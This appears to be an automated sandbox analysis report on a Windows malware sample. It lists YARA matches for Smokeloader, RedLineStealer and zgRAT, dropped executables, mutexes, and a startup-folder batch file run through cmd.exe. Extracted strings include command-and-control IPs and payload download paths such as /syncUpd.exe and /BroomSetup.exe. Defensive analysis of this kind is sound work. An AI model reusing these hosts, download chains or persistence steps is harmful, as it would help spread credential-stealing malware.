Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_041C89C8
Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | Code function: 21_2_041CC258
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041DBAB221_2_041DBAB2
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: String function: 004275A4 appears 43 times
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: String function: 00409CC0 appears 48 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 004275A4 appears 43 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 05CE1BE3 appears 40 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 05CE1D46 appears 39 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 00409CC0 appears 48 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 05CE9F27 appears 48 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 05D0780B appears 43 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 05CE36F8 appears 130 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 041C9F27 appears 48 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 004275A4 appears 43 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 041C1D46 appears 39 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 041E780B appears 43 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 00409CC0 appears 48 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 041C1BE3 appears 40 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 041C36F8 appears 130 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 004275A4 appears 43 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 05BB1BE3 appears 40 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 05BB1D46 appears 39 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 05BD780B appears 43 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 05BB9F27 appears 48 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 00409CC0 appears 48 times
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: String function: 05BB36F8 appears 130 times
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF6385CB330 appears 52 times
Source: file.exe | Static PE information: invalid certificate
Source: V4R2L1ofXzAhB4UFI0Rj2LED.exe.3.dr | Static PE information: Resource name: RT_CURSOR type: COM executable for DOS
Source: V4R2L1ofXzAhB4UFI0Rj2LED.exe.3.dr | Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: 9wqoiPpK0NIQEBygxfm6h42G.exe.3.dr | Static PE information: Resource name: RT_CURSOR type: COM executable for DOS
Source: 9wqoiPpK0NIQEBygxfm6h42G.exe.3.dr | Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: OFQ7ZJkbPO93pwjUuJw87q34.exe.3.dr | Static PE information: Resource name: RT_CURSOR type: COM executable for DOS
Source: OFQ7ZJkbPO93pwjUuJw87q34.exe.3.dr | Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: QV2CtvThMWBnTkQtNtmINgo7.exe.3.dr | Static PE information: Resource name: RT_CURSOR type: COM executable for DOS
Source: QV2CtvThMWBnTkQtNtmINgo7.exe.3.dr | Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: ra8RK0HZwqsQsFKuKAOljczn.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: 01ySZukOlUcP5NF6FSceJyuX.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: XqzL1fMvCxCCFKp0SSzKRmTk.exe.3.dr | Static PE information: Resource name: RT_CURSOR type: COM executable for DOS
Source: XqzL1fMvCxCCFKp0SSzKRmTk.exe.3.dr | Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: bfxtyeVJT5bBfIUy0v6XVgPU.exe.3.dr | Static PE information: Resource name: RT_CURSOR type: COM executable for DOS
Source: bfxtyeVJT5bBfIUy0v6XVgPU.exe.3.dr | Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: nMCfbx6hx0DUWGYJuDAMUAIJ.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: ugGFIzLnD3Xk89zL7XSYeDGh.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: 3CfyWUQfEPMLfwgMw9RKzj9q.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: 0Flev5sTDyJ3duKpLfv5ka2Z.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: Fh7qhqxo9lqcq8fZJGpCZFiC.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: 0DWhHyQpdxsJp4gA1M0WjqnA.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: CzCAVDbVcAMwrBna8hMGEVEa.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: IiFh1rXOMpGB7BnxmUig3wkQ.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: jZXBdg5rull5j6LgJCWVgVos.exe.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: 8FauF1Ec16N4pbn45vApMB9Y.exe.3.dr | Static PE information: Resource name: RT_CURSOR type: COM executable for DOS
Source: 8FauF1Ec16N4pbn45vApMB9Y.exe.3.dr | Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: file.exe | Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.1323600743.0000027F3A471000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNew.exe" vs file.exe
Source: file.exe, 00000000.00000002.1326287625.0000027F49071000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameayuUIPawoT8 vs file.exe
Source: file.exe, 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameayuUIPawoT8 vs file.exe
Source: file.exe, 00000000.00000002.1323600743.0000027F39A71000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNew.exe" vs file.exe
Source: 00000015.00000002.1918521862.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000029.00000002.2099601729.00000000041B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000027.00000002.2175970589.000000000418C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000022.00000002.2122134547.00000000043D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000029.00000002.2100222351.00000000043EC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.2255300318.000000000411C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000027.00000002.2184889083.0000000004440000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001D.00000002.1939799886.000000000439C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000022.00000002.2121373428.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001D.00000002.1938329589.0000000004300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001B.00000002.1937757105.000000000408C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000015.00000002.1930196904.000000000434C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001B.00000002.1940278884.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPED | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@208/425@0/45
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6385D4AD0 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Code function: 4_2_040CCCD6 CreateToolhelp32Snapshot,Module32First
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe | Mutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}
Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe | Mutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_11
Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | Mutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_12
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5204:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | Mutant created: \Sessions\1\BaseNamedObjects\BCClipboard {538F9E0A-E997-4AD2-8CB0-C8E991C010EF}
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | File created: C:\Users\user\AppData\Local\Temp\u5v8.0.exe
Source: Yara match | File source: 35.0.u69w.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000029.00000003.2080394798.0000000006A3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.1847945255.0000000006A38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000003.2086147863.0000000006A37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000000.1537903237.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.2095182963.0000000006A3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1624901520.0000000006A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.1635257524.0000000006A1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.1674965384.0000000006B5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\u624.1.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\u69w.1.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\u33c.1.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\u4dc.1.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\u1hw.1.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\u4hg.1.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\u46g.1.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\u2r8.1.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\u5v8.1.exe, type: DROPPED
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat" "
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: one | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: one | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: two | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: two | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: three | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: three | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: four | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: four | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: five | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: five | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: six | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: six | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: seven | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: seven | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: eight | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: eight | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: nine | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: nine | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: ten | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: ten | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: one | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: two | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: three | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: four | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: five | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: six | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: seven | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: eight | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: nine | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: ten | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.90 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.90 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.90 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: Installed | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: Installed | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.228 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.228 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.228 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.59 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.59 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: /syncUpd.exe | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: /syncUpd.exe | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.59 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: /syncUpd.exe | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: /1/Qg_Appv5.exe | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: /1/Qg_Appv5.exe | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: /1/Qg_Appv5.exe | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: Qg_Appv5.exe | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: Qg_Appv5.exe | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.228 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.228 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: /BroomSetup.exe | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: /BroomSetup.exe | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: 185.172.128.228 | 4_2_00424B3E
Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | Command line argument: /BroomSetup.exe | 4_2_00424B3E
